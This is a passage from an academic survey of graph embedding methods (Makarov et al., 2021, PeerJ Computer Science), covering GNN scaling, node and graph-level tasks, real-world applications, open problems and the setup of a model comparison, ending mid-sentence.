advances in deep learning and neighborhood sampling methodology. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 14/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Large graphs We have already mentioned that random walks and graph neural networks were proposed as the approximations for the different classic matrix factorization techniques. So in this section, we will discuss approaches to scale up GNN training. The basic idea implemented in different papers is a sampling. GraphSAGE (Hamilton, Ying & Leskovec, 2017a) learns trainable aggregations for sampled node neighbourhood. This approach was further improved with fixed-length random walk based importance sampling of the neighborhood in Ying et al. (2018a). GraphSAGE also provides the idea of minibatch training for GNNs. A similar idea was proposed in the Chen, Ma & Xiao (2018). Salha, Hennequin & Vazirgiannis (2020) propose to use linear aggregation over direct neighbors to simplify computations. The GraphSAINT (Zeng et al., 2019) compares different topology-based sampling algorithms (node, edge and random walks) in terms of bias and variance of learned GCN model. It also introduces unbiased estimator for aggregation of node and normalizes propagation by this value, that solves the scalability problem. Nie, Zhu & Li (2020) is based on the idea of Locality Preserving Projection. It works with anchor-based proximity matrices and calculates these anchors via Balanced and Hierarchical K-means. Such an approach allow to reduce complexity from n2d to ndm where n is a number of samples, d is embedding dimension and m is a number of anchors. Akyildiz, Aljundi & Kaya (2020) extends the VERSE (Tsitsulin et al., 2018) with graph partitioning and coarsening to provide fast embedding computation on the GPU. Atahan Akyildiz, Alabsi Aljundi & Kaya (2020) analyzes effects of graph coarsening on different embeddings in comparison to GOSH. Another distributed training framework was presented in Zheng et al. (2020a). It also provides efficient graph partitioning schemes for reducing between-machine communication. Gallicchio & Micheli (2020) keeps the graph embedding as the dynamical systems and study the embedding stability issue. Authors found that stable initialization allows to left weights untrained in deep sparse networks. Lu & Chang (2020) use softmax clustering for modularity maximization. They show that such a method is a linear approximation for main eigenvectors. APPLICATION OF GRAPH EMBEDDINGS TO MACHINE LEARNING PROBLEMS Here, we aim to overview core machine learning problems involving structural data. We start with problems related to small graph motifs such as nodes and edges, while further going to the problems connected to subgraphs and graphs as a whole. Node classification Definition 7 (Node classification) For a given graph G(V, E) with known labels for some of nodes from V, node classification is the task of predicting missing labels for existing or newly added nodes. Node classification deals with assigning class labels to nodes based on labeled nodes data (Zhu et al., 2007; Bhagat, Cormode & Muthukrishnan, 2011). The structural information is used in a context that “similar” nodes should have the same/similar labels. The original Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 15/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ framework uses label propagation based on random walks statistics (Xiaojin & Zoubin, 2002; Azran, 2007; Baluja et al., 2008). In an unsupervised framework, each node is embedded in a low-dimensional space following by training a classifier on the set of labeled node embedding vectors (Lu & Getoor, 2003; Bhagat, Cormode & Rozenbaum, 2009). Authors use such machine learning models as logistic regression (Perozzi, Al-Rfou & Skiena, 2014; Pimentel, Veloso & Ziviani, 2017), SVM (Wang, Cui & Zhu, 2016; Wang et al., 2017d), kNN (Le & Lauw, 2014; Wilson et al., 2014), random forest and xgboost (Makarov et al., 2018; Makarov et al., 2019c); the choice is usually made based on the size of training data, interpretability of features and embedding dimension. In semi-supervised framework, node embeddings are learned via loss function containing regularization for labeled data predictions, penalizing “similar” nodes to have different labels (Li, Zhu & Zhang, 2016; Yang, Cohen & Salakhutdinov, 2016a; Tu et al., 2016; Kipf & Welling, 2016a; Monti et al., 2017). Zhang, Zhou & Li (2020) proposes hierarchical GCN and pseudo-labeling technique for learning in scarce of annotated data. Liu et al. (2020b) proposes a sampling strategy and model compression for handling sparsity of labels. Chen et al. (2020) employs contrastive learning techniques to achieve semi-supervised parametrized fusion of graph topology and content information. Zhu et al. (2020c) also use metric learning approach but applies it to corrupted graph substructures. Nozza, Fersini & Messina (2020) use two-phase optimization for attributed graph embedding. Shi, Tang & Zhu (2020) aligns topology of attribute content network to the corresponding graph to simultaneously learn good embeddings. Wang et al. (2020b) propose two models for the imbalanced scenarios. A survey on classic techniques for node classification can be found in Bhagat, Cormode & Muthukrishnan (2011). Link prediction Definition 8 (Link prediction problem (LPP)) is a task of completing missing edges in noisy graphs or predicting new edges in temporal network structures. Formally, LPP for given graph G(V, E) with adjacency matrix A is a task of learning such function f that reconstruct or predict next adjacency matrix A based on different graph features such as metrics (e.g., Jaccard, Adamic-Adar), graph embeddings. Network science approach to the problem of predicting collaborations results in the link prediction (LP) problem (Liben-Nowell & Kleinberg, 2007) for temporal networks and missing edges reconstruction in noisy network data. Basically, it is a method to apply standard machine learning framework for graph data considering feature space consisting of pairs of nodes and their features. One of the interesting research questions is in the way of constructing edge embedding in a non-direct combination of node embeddings, as it was suggested in component-wise embeddings (Grover & Leskovec, 2016) or bi-linear combination of compressed node embeddings suggested in Abu-El-Haija, Perozzi & Al-Rfou (2017). Certain practical applications for drug combinations was suggested in Zitnik, Agrawal & Leskovec (2018). HARP Chen et al. (2018b) incorporates several hierarchical layers while transmitting information from edge embedding to node embedding. Other systems of directly Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 16/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ incorporating edge features and labels were suggested in CANE (Tu et al., 2017) and LANE (Huang, Li & Hu, 2017). Models of joint node and edge structure learning were proposed in Dual-Primal GCN (Monti et al., 2018) and ELAINE (Goyal et al., 2018). A model for embedding event graphs in which event is described by several edges was presented in HEBE (Gui et al., 2016). Wu et al. (2020) presents random walk with restart index. Phuc, Yamada & Kashima (2020) embeds several graphs with similar structural properties to boost link prediction accuracy. Keser et al. (2020) employs skip-connections in VGAE. Link prediction models are applied in web linking (Adafre & de Rijke, 2005), social dating services (Backstrom & Leskovec, 2011) and paper recommender system for digital libraries (He et al., 2010). The reader can found an up-to-date survey in Srinivas & Mitra (2016). LPP was specifically formulated in Liben-Nowell & Kleinberg (2007) based on nodes pairwise similarity measures. Approaches for link prediction include similarity based methods (Adamic & Adar (2003)), maximum likelihood models (Clauset, Moore & Newman, 2008), and probabilistic models (Getoor & Taskar, 2007; Heckerman, Meek & Koller, 2007). In Tang & Liu (2012), authors are suggesting unsupervised approach for LP problem. Gao, Denoyer & Gallinari (2011), Gao et al. (2015) suggested temporal link prediction based on matrix factorization technique and noise reduction in large networks. Attribute-based link formation in social networks was studied in McPherson, Smith-Lovin & Cook (2001), Robins et al. (2007), while deep learning approaches were presented in Liu et al. (2013), Zhai & Zhang (2015) and Berg, Kipf & Welling (2017). Heterogeneous graph link prediction for predicting links of certain semantic type was suggested in Liu et al. (2017b, 2018b). An evaluation of link prediction models based on graph embeddings for biological data was presented in Crichton et al. (2018). Two surveys on link prediction methods describing core approaches for feature engineering, that is, Bayesian approach and dimensionality reduction were presented in Hasan & Zaki (2011) and Lü & Zhou (2011). Survey on link prediction was published in Wang et al. (2015). Node clustering Definition 9 (Node clustering or community detection or graph partitioning) is the task of the partitioning of a graph G(V, E) into several subgraphs Gi(Vi, Ei) with a dense connection within groups and sparse connection between clusters. Node clustering (also known as community detection in social network analysis) aims to find such a grouping (labelling) of nodes so that nodes in the same group are closer to each other rather than to the nodes from outside of the group (Malliaros & Vazirgiannis, 2013). No labels are provided on initial step due to unsupervised type of the problem. Methods use attribute (Zhou, Cheng & Yu, 2009) or structural information. The latter methods of graph clustering are usually based on either community detection (Newman & Girvan, 2004; Fortunato, 2010) or structural equivalence (Xu et al., 2007). In community detection (Shi & Malik, 2000; Ding et al., 2001), the cluster is defined as Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 17/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ dense subgraph with a high number of edges inside subgraph, and a low number of edges between subgraph and the rest of a graph. The general idea is to use node embeddings as a compressed representation of sparse graph adjacency matrix and then apply standard clustering algorithms, such as K-means or DBScan, for vectorized data (White & Smyth, 2005; Tian et al., 2014; Cao, Lu & Xu, 2015; Chen et al., 2015b; Cao, Lu & Xu, 2016; Nie, Zhu & Li, 2017). Going further, joint optimization of clustering and node embedding was suggested in Tang, Nie & Jain (2016), Wei et al. (2017). Efficient iterative community aware network embedding was proposed in Wang et al. (2017d) and several others (Zheng et al., 2016; Cavallari et al., 2017). Teng & Liu (2020) propose multi-objective evolutionary algorithm for community detection. Zhang, Shang & Jiao (2020) use multi-objective matrix factorization over several shortest path graphs and utilizes (MOEA) to find community structure. Salim, Shiju & Sumitra (2020) train the embeddings on different views for preserving many properties of a given network. Quiring & Vassilevski (2020) employs hierarchical coarsening of the graph to better extract clusters. Subgraph (and graph) embedding While studying network embedding, one may think of a way to aggregate or generalize low-level node feature representation to the whole network representation, thus stating the problem of embedding the whole graph (Song, 2018). Such vector is required for the graph-level tasks like graph classification, similarity and clustering. It considers the whole network as one structural unit in the training dataset. The task is relevant to chemistry or biology domains (Nikolentzos, Meladianos & Vazirgiannis, 2017; Zhang et al., 2016a; Duvenaud et al., 2015; Dai, Dai & Song, 2016; Niepert, Ahmed & Kutzkov, 2016; Kearnes et al., 2016). They can also be applied for graph reasoning (Li et al., 2015c) or computer vision tasks (Bruna et al., 2013). In Duvenaud et al. (2015), the sum based approach over network embedding was suggested. Following by it, in Dai, Dai & Song (2016), authors proposed neural network aggregation for constructing network embedding which is an argument for summing over subgraph nodes. Improvement of these methods was later suggested in Bronstein et al. (2017) based on approximations of spectral graph decompositions. Ordered-based (Niepert, Ahmed & Kutzkov, 2016) and fuzzy-based (Kearnes et al., 2016) approaches based on aggregating features from convolutional approaches further improved subgraph embedding models. Sun, Hoffmann & Tang (2019) maximize the mutual information between embedding and different graph substructures. The general approach of Gilmer et al. (2017) as well as other convolutional approaches can be generalized by pooling-aggregation models or, as was suggested in Scarselli et al. (2009), by adding super-node for whole graph embedding. The attention mechanism was applied to the graph classification task (Lee, Rossi & Kong, 2018). Definition 10 (Line (dual) graph) For a graph G = (V, E) defined as a set of vertices V and a set of edges E � V � V without loops and multi-edges we denote by G* = (V*, E*) a dual (Line) graph the nodes of which are the edges of G and edges are nodes, in the Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 18/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ sense that two adjacent nodes are connected by an edge if corresponding edges have a common node incident to them. In graph-level tasks, specific network properties play a major role. So vectors reconstructing sophisticated similarity metrics closely related to the problem of graph isomorphism was studied in several works (Shervashidze et al., 2011; Niepert, Ahmed & Kutzkov, 2016; Mousavi et al., 2017; Yanardag & Vishwanathan, 2015; Narayanan et al., 2016). GL2VEC (Chen & Koga, 2019) extends Narayanan et al. (2016) model with edge features by utilizing the line graph. The works on matching node embedding and graph kernels were suggested in Johansson & Dubhashi (2015), Nikolentzos, Meladianos & Vazirgiannis (2017). In Donnat & Holmes (2018) authors analyze graph-based distance methods for a temporal graph of bio-medical surveys. Hierarchical clustering and fusion of different network representations were overviewed in Yang & Wang (2018). Usually, this kind tasks require fusion of different similarity representations of a network as different graphs (Serra, Greco & Tagliaferri, 2015; Xue et al., 2015), preserving graph structure (Hou et al., 2017) or simultaneously performing semi-supervised classification and clustering with adaptive kNN model (Nie, Cai & Li, 2017). Different domain network clustering was suggested in Cheng et al. (2013) and improved in the following works suggesting fusion of different not-synchronized networks with different structures (Ni et al., 2016), cross-domain associations (Liu et al., 2015b) or multi-view spectral clustering (Li et al., 2015b). Khasahmadi et al. (2020) propose a memory layer for graphs, that can efficiently learn graph hierarchical representations. Tsitsulin, Munkhoeva & Perozzi (2020) propose an algorithm for efficient calculation of spectral distances for large graphs. Kolouri et al. (2020) suggest the embedding preserving Wasserstein distance with linear complexity. Qin et al. (2020) presents one more graph pooling technique that uniformly aggregates neighborhood. Baldini, Martino & Rizzi (2020) embeds maximal cliques to preserve structural similarities between graphs. Yan & Wang (2020) states the problem of transfer learning suggesting the framework for graph alignment and further adaptation learning for GNNs. Network visualization Definition 11 (Graph visualization) is a way to map a graph to a low (2D, 3D) dimensional space. All nodes are either directly embedded as 2D vectors (Le & Lauw, 2014; Wang, Cui & Zhu, 2016; Cao, Lu & Xu, 2016; Tu et al., 2016; Niepert, Ahmed & Kutzkov, 2016; Pan et al., 2016) or first embedded to certain dimension, and then compressed via PCA (Herman, Melançon & Marshall, 2000) or t-SNE (Maaten & Hinton, 2008) (or other dimension reduction frameworks, see for, for example, Tenenbaum, De Silva & Langford, 2000, De Oliveira & Levkowitz, 2003) in order to plot in 2D space. If there are labels or communities representative for network dataset, the nodes are usually visualized with different colors for each label in order to verify whether similar nodes are embedded closer to each other. Such models, as Perozzi, Al-Rfou & Skiena (2014), Grover & Leskovec (2016), Tang et al. (2015), Ou et al. (2016), Wang, Cui & Zhu (2016) demonstrated proper Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 19/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ performance on the task of network visualization for unsupervised graph embedding models. Evaluation of graph embeddings for large structural data visualization can be found in Tang et al. (2016a). Graph visualization techniques beyond planar mappings can be found in Didimo, Liotta & Montecchiani (2019). Network compression Definition 12 (Network compression, simplification or sparsification) is a task of reducing the number of nodes and edges in a graph, for further efficient application of graph algorithms. The concept of network compression was first introduced in As Feder & Motwani (1991) under the idea of reducing the number of stored graph edges while achieving a faster performance of certain algorithms on graphs. The compression was made by grouping nodes and edges into partitions of bipartite cliques and then replacing these cliques with trees. Similar ideas of dividing the graph into groups of nodes and edges and encoding them were proposed in several studies (Pardalos & Xue, 1994; Tian, Hankins & Patel, 2008; Toivonen et al., 2011). Minimum Description Length (MDL) (Rissanen, 1978) was used in Navlakha, Rastogi & Shrivastava (2008) to construct graph summary adjusted with edge correction algorithm. Graph embeddings support compact graph representation, reducing memory storage from O(|V| × |V|) to O(d × |V|), where embedding dimension d � n below 200 was shown to be enough for qualitative network reconstruction for second-order preserving proximity models (e.g., link prediction), such as Ou et al. (2016) and Wang, Cui & Zhu (2016). They also suit for various graph optimization task providing useful tools for constructing graph-based heuristics (Khalil et al., 2017). APPLICATIONS TO REAL-WORLD PROBLEMS In this section, we are interested in how graph embeddings appear in many other computer science fields, in which graphs are not directly expressed in the data, but relations between the objects can be efficiently described by graphs, and so, graph embeddings. Computer vision Image classification can be solved with classic CNN models considering the images as a grid-like structure. Recently, graph convolutional network models can take into account different neighboring relations, thus going beyond the nearest pixels as the only features for convolutions. Especially interesting results were obtained for 3D shape reconstruction (Monti et al., 2017) and video action recognition. There are four main ideas of using graph neural networks for computer vision tasks: working with the interaction of objects on video and images, feature similarity graph, label graph, that is, images with the same label are connected, and internal graph-structured image data. One of the main problems with CNN is that they should be deep enough to account interaction information between object, so Chen et al. (2019c) propose GloRe unit that applies GCNs over interaction data. It helps to efficiently solve relational reasoning task. In Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 20/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Wang et al. (2018) relation graph of image objects was built for localizing object instance from natural language expression. Graph representation is also useful for representing in-label object interaction like in metric learning. It successfully applied to face clustering task (Yang et al., 2019; Wang et al., 2019b). Also such graph was exploited by Kim et al. (2019) for few-shot learning classification. Graph Convolutions are widely used in skeleton-based action recognition. It applies different graph network models to human skeleton graph (Shi et al., 2019; Si et al., 2019; Li et al., 2019a). GNNs are used for video tracking and classification tasks (Zhang et al., 2018a; Gao, Zhang & Xu, 2019; Zhong et al., 2019). Natural language processing NLP is highly correlated to graph tasks. Here similar sequential methods are used, while data have hierarchical structure from different views. In Marcheggiani & Titov (2017), authors assign semantic roles by encoding sentences with the graph convolutional network. In Marcheggiani, Bastings & Titov (2018), Zhao et al. (2019) graph convolutional network models were applied for machine translation. Sevgili, Panchenko & Biemann (2019) use the Wikipedia link graph between entities to improve the quality of entity disambiguation task on unstructured text data. Graph models are widely used in NLP to extract syntactic and semantic information (Luo et al., 2019; Vashishth et al., 2019; Veyseh, Nguyen & Dou, 2019). The main approach is to extract the dependency graph and learn node (word) embeddings using GCN. Another approach is to examine each sentence as a complete graph with adjacency weighted by attention. Graph neural networks also help in sequence tagging task, because it natively exploits information about the connection between different entities. Zhu et al. (2019) propose the Generated Parameters GNN for the Relation extraction task. It also builds a complete graph of entities in the sentence via encoding of the sentence with any sequence model. After that, GNN is applied to solve the node classification task. A prominent application of GNNs is to encode dependency tree information. Such an approach is exploited by Guo, Zhang & Lu (2019), they apply Graph Attention Models. Sahu et al. (2019) also use dependency graph for relation extraction tasks, but their model accounts for inter-sentence dependencies. Question answering, comment generation and dialog systems are highly dependent on domain knowledge-base. Such knowledge-base usually can be depicted as knowledge graphs. Banerjee & Khapra (2019), Kim, Kim & Kwak (2018) applies GNN to encode knowledge and account to it in these tasks. Li et al. (2019b) also use graph models based on news interaction graphs. The transformer-based language models (Vaswani et al., 2017) works in a similar way to graph attention networks. It models a sentence as a complete graph and calculates new word representation weighting previous vectors with self-attention. The BERT model (Devlin et al., 2018) is a special case of transformer-based models. It learns the vector by predicting masked words. Such tasks can be formulated as link prediction between context and masked words. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 21/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Knowledge graph completion Knowledge graph embedding aims to learn vectors for entities and multi-dimensional vectors for entity relations. Knowledge graph completion solves link prediction between entities in knowledge graphs thus predicting ordered triples of entity-relation-entity (Lin et al., 2015). Knowledge graph (KG) embedding presents a knowledge base as a collection of triples “head-relation-tail” and consider them training samples. Structured Embedding (Bordes et al., 2011) learns two separate entity-relation representations for head and tail, while Semantic Matching Energy (Bordes et al., 2012), Latent Factor Model (Jenatton et al., 2012) and Neural Tensor Network (Socher et al., 2013) embed entities and relations, and use models to capture correlations between them. A survey on KG embeddings Wang et al. (2017a) considers translation-based models, such as TransE (Bordes et al., 2013), TransH (Wang et al., 2014), TransM (Fan et al., 2014), TransR/CTransR (Lin et al., 2015), TransC (Lv et al., 2018), TransD (Ji et al., 2015), TranSparse (Ji et al., 2016), KG2E (He et al., 2015), and semantic matching models, based on RESCAL (Nickel, Tresp & Kriegel, 2011) tensor factorization framework, such as DistMult (Yang et al., 2014), HolE (Nickel, Rosasco & Poggio, 2015) and ComplEx (Trouillon et al., 2017) with comparison paper for the latter two in Trouillon & Nickel (2017). Question answering via knowledge graph embeddings was suggested in Huang et al. (2019). Weighted attention for supporting triple in KG link prediction problem was presented in Mai, Janowicz & Yan (2018). Data mining Ye et al. (2019) proposed method that models relations between different entities in Android logs (API, apps, device, signature, affiliation) using a hierarchical graph. Then they classify nodes of such graphs for real-time malware classification. Graph neural networks are widely used to utilize the social network information. Wu et al. (2019a), Song et al. (2019), Chen et al. (2019a) use such models to account for social effects in recommender systems. Zhang, Ren & Urtasun (2019) propose Graph HyperNetworks for neural architecture search. It learns topology of architecture and infers weights for it. Recommender systems The basic approach for recommending top K nodes of interest for a given node is usually based on certain similarity metric (Pirotte et al., 2007; Zhao et al., 2013; Gui et al., 2016; Zhou et al., 2017; Ou et al., 2016). There are various situations in which one need to provide node recommender system Zhang & Wang (2016), in particular, for items to customers via APP model (Zhou et al., 2017), documents matching a given query (Xiong, Power & Callan, 2017), community-based question answering (Zhao et al., 2016; Fang et al., 2016), music recommendations via user preference embedding for query answering (Chen et al., 2015a, 2016a), location recommendations (Xie et al., 2016), and many other real-world scenarios. Matrix completion approach based on graph embeddings was provided in Monti, Bronstein & Bresson (2017). Large scale recommender system was presented in Ying et al. (2018a). Explainable recommendations were studied in Zhang & Chen (2018). Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 22/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ In Zhang, Wang & Zhang (2019d) authors represents product search as a graph of co-clicked answers. They mix network embedding, term item vectors and term query vector using MLP to predict the probability of click on the item in certain query. This score is used to rank products. STAR-GCN (Zhang et al., 2019c) is used over user-item interaction graph to learn user and item vectors. This approach is also suitable for inductive learning only using several interactions of users and items. This helps to solve the cold-start problem in recommender systems. Shang et al. (2019) use graphs for encoding hierarchical structure of health diseases. Next, achieved embeddings are integrated into BERT model for visit-based user recommendation. The classical specific case of using network science in recommendations is the link prediction in collaborator networks (Chen, Li & Huang, 2005; Liu & Kou, 2007; Li & Chen, 2009; Cho & Yu, 2018). Kong et al. (2018) developed a scientific paper recommender system based on citation networks, which uses text information embeddings to find papers of similar research interest and structural network embedding. The combined embedding model was then applied for constructing article vector representations. A combination of network and knowledge graphs was proposed in Yang, Tang & Cohen (2016b). In Makarov et al. (2019a, 2019b, 2019c) authors show that two-level architecture can improve the recommendation results. Firstly it predicts the collaboration itself and further estimates its quantity/quality. A survey on co-authorship and citation recommender systems may be found in Ortega et al. (2018b). Biomedical data science The large variety of data in biomedicine can be represented as networks. Le, Yapp & Yeh (2019) applies embedding techniques to electron transport chains. Do, Le & Le (2020) utilizes it for detection of specific proteins. Lin et al. (2020b) exploits the dynamic graph embedding for detecting changes in functional connectivity in the brain network. Computational drug design is an attractive direction because it reduces the costs of development of new drugs. The prominent field is drug repositioning. It usually works with networks of drug interaction with other entities: target, disease, gene or another drug. The main idea of such task is to predict possible relations between drug and other entities Su et al. (2020). For example, drug-disease interaction networks can predict the possible treatment of new disease with existing drugs. So, it is a similar statement to the link prediction problem. Yamanishi et al. (2008), Cobanoglu et al. (2013), Ezzat et al. (2017) find drug-target pairs via proximity over matrix factorization based embeddings. Zheng et al. (2013), Yamanishi et al. (2014), Ezzat et al. (2016) try to add external data to the drug-interaction network embeddings. Luo et al. (2017), Zong et al. (2017), Alshahrani et al. (2017) build heterogeneous networks of different drug-related interaction and apply network embedding methods to it. Wang et al. (2019a) embeds heterogeneous gene graph to predict drug response. Another important field in medicine design is the adverse drug reaction (ADR) analysis. Some articles (Zitnik & Zupan, 2016; Zitnik, Agrawal & Leskovec, 2018) focus on similar drug–drug and drug–target interaction prediction. Wang (2017), Abdelaziz et al. (2017) Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 23/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ use the knowledge graph based on biomedical texts. Stanovsky, Gruhl & Mendes (2017) also works with KG embedding, but over ADRs mentions in social media. Network science is also applied to the molecule structure. Li et al. (2017b) proposes a prediction of pathogenic human genes using network embedding. Network embedding is very popular method in protein–protein interaction assessment and function prediction (Kulmanov, Khan & Hoehndorf, 2018; Su et al., 2020; Wang, Qu & Peng, 2017b). Shen et al. (2017) and Li et al. (2017a) applies to miRNA-disease interaction network to associate genes with complex diseases. The detailed survey of biomedical network embedding applications is presented by Su et al. (2020). Reinforcement learning Reinforcement learning (RL) is a popular approach to solve combinatorial optimization problems. Zheng, Wang & Song (2020) provides the open-sourced environment for graph optimization problems using reinforcement learning and graph embeddings. Hayashi & Ohsaki (2020) use RL for a similar task, such as binary topology optimization of trusses. It utilizes graph convolution networks for feature extraction and further usage in RL optimization. A similar concept was used in Yan et al. (2020) to solve automatic embedding problem using actor-critic models for optimization and graph embeddings for representation learning. Waradpande, Kudenko & Khosla (2020) suggests encoding states in Markov’s decision process with graph embedding models. Lin, Ghaddar & Nathwani (2020a) follows this idea and utilizes GNN for parametrization of the stochastic policy in electric vehicle routing problem. Zhou et al. (2020) solves the interactive recommender system problem enhancing it with knowledge graphs. It describes states using GCN over knowledge graph. OPEN PROBLEMS Here we mention the most interesting open problems in graph representation theory, which are far from good results applicable for any given scenarios. Many real-world graphs are dynamic: nodes and edges can appear and vanish over time. Despite a large number of recent papers, this field is far from benchmark well-performing models as of now. One of the approaches for it is inductive learning, which is strongly correlated with graph dynamics problem. Inductive methods allow finding embedding for newly added nodes without refitting the whole model. It is important in real-world applications and partially solve the scalability issue. Edge attributes aware network embedding is poorly studied field. There is a low number of models. Such models usually depend on a Line graph, which has a dramatically larger number of nodes. So such models have a problem with scalability. Edge attributes are important in such tasks as context-aware recommender systems or transportation networks optimization. They are an only little number of works about subgraph embedding. Such models should represent complex structures like triangles or hierarchy. The application of non-euclidean spaces to the embedding task is a promising method solving this issue, but also poorly studied. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 24/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Recent advances in the distributed and batch training for graph neural networks looks promising. However, most of the methods are not theoretically grounded, so it could be hard to understand the issues of poor quality of results. Only Zeng et al. (2019) provides some bias-variance analysis of node and edge sampling approaches. However, Akyildiz, Aljundi & Kaya (2020) provides a much faster and powerful method for large scale embedding. Another field that is currently under the control of many papers is the heterogeneous graph embedding. Such graphs are very common in real-world scenarios. The graph attention-based methods look promising in that field. It allows us to catch different aggregation levels like in Fu et al. (2020) and Li et al. (2020b). As can be seen from our survey, most embedding models catch specific graph attributes and there is no general model, thus, raising a problem of selection and recommendation of different models for specific use-cases. It is also an interesting point to develop meta-strategies for embedding mixture, that will preserve different graph properties. Such meta-models could solve the problem of knowledge generalization and reduce costs for deploy of application. As in the other fields like NLP and CV, graph neural networks are poorly interpretable, apart from an initial study in Ying et al. (2019). These and many other research questions lead to a vast amount of open research directions, which will benefit the field and lead to many applications in other computer science domains. In our study, we focus on another interesting question regarding the fact that there are almost no general studies that compare the performance of models based on graph properties, most of the models are created for specific graph use-case. Below, we provide our insights on real-world networks as well as interpretations on such findings. MODEL COMPARISON This paper focuses on the four most popular tasks on graphs: node classification, link prediction, node clustering and network visualization. These tasks cover most of the real-world applications, in which a graph is used to unify information on nodes and their properties. Data We use four benchmark datasets for comparison of different models: CORA (Sen et al., 2008), Citeseer (Lim & Buntine, 2016), HSE coauthor network (Makarov et al., 2018), and Microsof Academic Graph Computer Science (MAG CS) (Sinha et al., 2015). First two datasets are citation networks. This type of networks is very common for evaluating the quality of network embeddings. Also, these datasets are convenient for comparison of models, because they have interesting label and feature structure. The last dataset is a co-authorship network. It has heterogeneous edges and large size. General puspose graph embedding models work only with homogeneous graphs, so we merge all the edges between nodes in one edge. A brief overview of the datasets statistics is provided in Table 2. Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 25/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ Metrics We use standard classification metrics for node classification and link prediction tasks. � Accuracy is the rate of the right answer of a classifier. � Precision is the rate of true positive answers relative to the number of all positive answers of a classifier. � Recall is the rate of true positive answers relative to the number of all positive examples in the data. � F1 is a harmonic mean of precision and recall. � Area Under ROC-curve shows the probability that a random negative example sampled from a uniform distribution is ranked lower than randomly sampled positive. � Average precision is the average of all possible precision values weighted by the recall for different probability thresholds. We calculate the standard deviation with the following procedure: 1. Generate subsample of data with 90% volume of a given dataset. 2. Train model on it 3. Estimate quality of the trained model on the test set. 4. Repeat previous steps nine more times. Described bootstrap (Efron (1992)) procedure allows to easily calculate standard error and confidence intervals for any statistics. Confidence intervals are required to understand the significance of the difference between models. Node clustering was evaluated with two metrics: silhouette coefficient and modularity. � Silhouette score shows the average similarity between each example and its cluster in comparison with the closest another cluster, so it measures the overall cluster separation relative to the distance measure. In our study, we use the Euclidean distance. � Modularity score works pretty similarly but for computing inter- and intra-cluster quality, it measures the density of connections between clusters, respectively to its density inside clusters. We also evaluate the quality of node clustering and network visualization with a visual comparison of how clusters are grouped in the UMAP (McInnes, Healy & Melville, 2018) projection of embeddings. UMAP (Uniform Manifold Approximation and Projection) Table 2 Datasets description. Assortativity Label modularity #Nodes #Edges #Features #Classes CORA 0.7711 0.8061 2708 10,556 1,433 7 CITESEER 0.6754 0.8872 3327 9,228 3,703 6 HSE – – 4181 12,004 0 0 MAG CS 0.7845 0.6989 18333 16,3788 6,805 15 Makarov et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.357 26/62 http://dx.doi.org/10.7717/peerj-cs.357 https://peerj.com/computer-science/ is the dimensionality reduction technique based on topology and Riemannian geometry. Firstly, it builds the weighted nearest neighbors graph according to elements feature vectors (embeddings). Then, it initializes layout using spectral embedding and optimizes it using SGD minimizing fuzzy-set cross-entropy. The UMAP works much faster then TSNE and gives at least the same quality of the projection. Interpretation of received plot is simple: similar samples in initial space (for e.g., nodes with the same labels) should lie closely in the 2D plane. Evaluation pipeline The node classification task is native multi-class classification. Link prediction task can be also solved as classification, but with two classes depicting edge existence. The basic approach on validating such methods is to use delayed sample. So, before any model was trained, we create a train-test split for all the datasets, in order to compare all the models on similar subsets. We use simple 50% test, 50% train random split for node classification, following other papers on graph embeddings. The problem with link prediction is that described graphs are high-imbalanced because there are much more unconnected node pairs. Large imbalance leads to poor training because even simple constant prediction will give high-scores. One of the methods for working with this problem is to the under-sample larger class. To keep the classification task harder, it is convenient to use a negative sampling technique. We select the most similar pairs of nodes which are not connected in the same amount as existent edges. The used proximity metric is cosine similarity, which is a normalized dot product of feature vectors. For features, we use the adjacency matrix. Because basic classification models do not work with discrete graph data, after developing train and test samples, we need to generate meaningful features. Here we use the unsupervised graph embeddings (128 dimensions as commonly used in different papers and surveys). Graph neural networks were also trained in an unsupervised way with reconstruction loss over the graph adjacency matrix. Reconstruction loss calculates with binary cross-entropy between adjacency matrix and its estimation achieved by inner-product decoding from the embedding matrix. Now, we can solve downstream tasks like classification or clustering. For that part, we use three different classifiers: logistic regression (LR), random forest (RF) and gradient boosting (GBM). Logistic regression is a linear model: it calculates the weighted average of object features and normalizes it with sigmoid to receive probability. Linear models are fast, interpretable and easily tunable because of their simplicity. Random forest is the ensemble of decision trees built on bootstrapped subsamples in both dimensions features and observations. Gradient boosted machines are another approach to learn decision tree ensemble. It determines each next tree by sequential optimization of the previous learner error-term. The main advantage of the tree-based models is that they could recover non-linear dependencies. But for this flexibility, we pay with a strong dependance on hyperparameter selection. Scikit-learn implementation with default hyperparameters was used. In the link prediction, we simply concatenate node vectors to achieve edge embedding. For the clustering, we use the K-means model from 